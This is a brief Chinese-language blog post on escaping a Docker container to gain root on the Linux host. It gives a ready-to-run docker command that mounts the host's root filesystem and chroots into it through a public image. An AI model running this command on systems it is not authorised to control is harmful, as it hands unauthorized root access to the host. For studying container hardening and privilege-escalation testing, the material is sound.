docker逃逸提权

Linux利用docker逃逸提权

这里直接拉取一个提权镜像,大致原理就是拉取镜像时将宿主机根目录挂载进docker,而docker启动后自动执行启动脚本chroot逃逸出来了,详细内容可以参考镜像的github:https://github.com/chrisfosterelli/dockerrootplease

docker run -v /:/hostOS -it --rm chrisfosterelli/rootplease

在容器内输入命令可以看到直接就提升到root权限了,其实和前面的chroot逃逸差不多,同时在容器里面输入命令也是跟在宿主机操作差不多的

posted @ 2026-06-19 13:32  Doll_Marker  阅读(15)  评论(0)    收藏  举报